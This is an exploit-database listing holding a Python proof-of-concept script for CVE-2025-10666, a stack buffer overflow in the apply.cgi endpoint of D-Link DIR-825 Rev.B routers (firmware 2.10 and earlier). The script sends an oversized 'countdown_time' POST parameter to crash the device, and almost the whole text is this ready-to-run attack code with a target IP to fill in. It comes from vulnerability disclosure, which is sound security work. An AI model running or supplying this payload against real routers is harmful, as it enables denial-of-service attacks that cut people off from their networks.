Share
## https://sploitus.com/exploit?id=PACKETSTORM:215036
# Exploit Title: D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)
    # Google Dork: N/A
    # Date: 2025-09-25
    # Exploit Author: Beatriz Fresno Naumova
    # Vendor Homepage: https://www.dlink.com/
    # Software Link: https://tsd.dlink.com.tw/downloads2008detail.asp
    # Version: DIR-825 Rev.B <= 2.10
    # Tested on: DIR-825 Rev.B physical hardware, local network
    # CVE: CVE-2025-10666
    #
    # Description:
    # A stack-based buffer overflow vulnerability exists in the apply.cgi endpoint of the
    # D-Link DIR-825 Rev.B router (firmware <= 2.10), triggered via the countdown_time parameter.
    # This PoC sends an overly long POST parameter to crash the process.
    
    import requests
    
    TARGET = "http://192.168.0.1/apply.cgi"  # Change this to the router's IP
    LENGTH = 4000                            # Adjust length for testing / fuzzing
    PAYLOAD = "1" * LENGTH
    
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://192.168.0.1/",
    }
    
    data = {
        "countdown_time": PAYLOAD
    }
    
    try:
        print(f"[+] Sending exploit payload ({LENGTH} bytes) to {TARGET}")
        r = requests.post(TARGET, headers=headers, data=data, timeout=5)
        print(f"[+] Status Code: {r.status_code}")
        print("[+] Exploit sent. Check if the router crashes or becomes unresponsive.")
    except Exception as e:
        print(f"[-] Failed to send exploit: {e}")